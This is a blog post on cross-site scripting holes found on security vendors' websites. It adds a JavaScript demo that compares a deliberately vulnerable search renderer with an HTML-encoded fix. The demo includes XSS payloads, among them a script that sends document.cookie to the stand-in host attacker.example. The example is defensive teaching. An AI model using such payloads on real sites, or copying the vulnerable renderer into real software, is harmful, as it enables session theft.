From DarkReading.com:

With all the talk about hackers launching attacks from legitimate Websites, you’d think that the major security vendors’ sites, at least, would be vulnerability-free.

Not so, according to a report issued yesterday by a security watchdog site.
The site, XSSed, states that it has verified some 30 cross-site scripting vulnerabilities spread across the Websites of three of the industry’s best-known security vendors: McAfee, Symantec, and VeriSign. The vulnerabilities could make it possible for attackers to launch phishing campaigns from these sites or even distribute malware to the companies’ customers, according to XSSed.

Cross-site scripting vulnerabilities aren’t a new type of threat, and they aren’t particularly difficult to defend against: consistently HTML-encoding untrusted input before it is written into a page closes the reflected variety reported here. It seems a little crazy that the companies that many people depend on to help them get a handle on security don’t practice what they preach. Or then again, maybe they don’t even preach it:

This isn’t the first time that XSS vulnerabilities have been exposed on sites such as McAfee’s and Symantec’s, notes Jeremiah Grossman, CTO of WhiteHat Security. Back in January, XSSed reported that some 60 sites that had received the “hacker safe” label from McAfee’s ScanAlert service were vulnerable to XSS attacks. (Emphasis added)

I disagree with Grossman’s conclusion, however, that the XSS vulnerabilities on these security companies’ web sites aren’t something to worry about. His argument is that, while these are security companies, they primarily focus on anti-virus and anti-malware software. However, when these companies start handing out “Hacker Safe!” badges to other web sites (which, in my opinion, is like throwing rocks at a beehive), they put themselves in an arena in which things like simple XSS vulnerabilities cannot be overlooked. I believe that the “more important” sites that are mentioned, such as bank and e-commerce web sites, are really unlikely to have their security problems taken care of before the people who are supposed to “know security” do.
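To show concretely what “not particularly difficult to defend against” means for the reflected XSS reported by XSSed, here is an added example written for this page. It is not code from the original post, from DarkReading, from XSSed, or from any of the vendors named. It assumes a hypothetical site-search results page that reflects a query parameter (called `q` here), renders it once without and once with HTML encoding, and runs a small tag scanner standing in for the browser’s tokenizer to list the elements and event-handler attributes that were not part of the template. The two payloads are constructed for the demonstration.

```javascript
// Added example (not from the original post or the sites it discusses):
// a reflected cross-site-scripting hole and its fix, on a hypothetical
// search-results page. Parameter name "q" and the markup are assumptions.

// Escape the five characters that let attacker-controlled text break out
// of an HTML text node or a double-quoted attribute value.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: the query is pasted straight into the markup, so a link such as
// /search?q=<script>...</script> runs the attacker's script in the victim's
// browser with the vendor's origin (cookies, session, the lot).
function renderSearchVulnerable(query) {
  return `<h1>Results for ${query}</h1>\n` +
         `<input type="text" name="q" value="${query}">`;
}

// Hardened: every reflected value is HTML-encoded. Both places where it lands
// (text node and double-quoted attribute) are covered by the same encoding.
function renderSearchSafe(query) {
  const q = escapeHtml(query);
  return `<h1>Results for ${q}</h1>\n` +
         `<input type="text" name="q" value="${q}">`;
}

// Minimal tag scanner standing in for the browser's tokenizer (not a real
// HTML parser): returns each opening tag's name and the names of its
// attributes, honouring quoted attribute values so escaped text is not
// mistaken for markup.
function elementsIn(html) {
  const tagRe = /<([a-zA-Z][\w-]*)([^>]*)>/g;
  const attrRe = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=<>]+)))?/g;
  const found = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = [];
    let a;
    while ((a = attrRe.exec(m[2])) !== null) attrs.push(a[1].toLowerCase());
    found.push({ tag: m[1].toLowerCase(), attrs });
  }
  return found;
}

// Anything beyond the template's own <h1> and <input>, or any on* handler
// attribute, only got there through the reflected query.
const TEMPLATE_TAGS = new Set(['h1', 'input']);

function injectedMarkup(html) {
  const findings = [];
  for (const el of elementsIn(html)) {
    if (!TEMPLATE_TAGS.has(el.tag)) findings.push(`<${el.tag}>`);
    for (const name of el.attrs) {
      if (name.startsWith('on')) findings.push(`${el.tag}[${name}]`);
    }
  }
  return findings;
}

// Constructed payloads: one that injects a new element into the text node,
// one that closes the attribute and injects an element with an event handler.
const PAYLOADS = [
  '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
  '"><img src=x onerror=alert(document.domain)>',
];

function demo() {
  return PAYLOADS.map((payload) => ({
    payload,
    vulnerable: injectedMarkup(renderSearchVulnerable(payload)),
    hardened: injectedMarkup(renderSearchSafe(payload)),
  }));
}

for (const result of demo()) {
  console.log(`payload: ${result.payload}`);
  console.log(`  vulnerable page: ${result.vulnerable.join(', ') || 'nothing injected'}`);
  console.log(`  hardened page:   ${result.hardened.join(', ') || 'nothing injected'}`);
}
```

The point of the scanner is to show what the browser ends up with, not to serve as a filter: the fix is the encoding in `renderSearchSafe`, applied at output time to every reflected value, which is the same discipline whether the site sells antivirus or issues “hacker safe” badges.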

One thought on “Do as we say, not as we do”

  1. PLR Products says:

    Never really looked at the information like that before. Thanks!
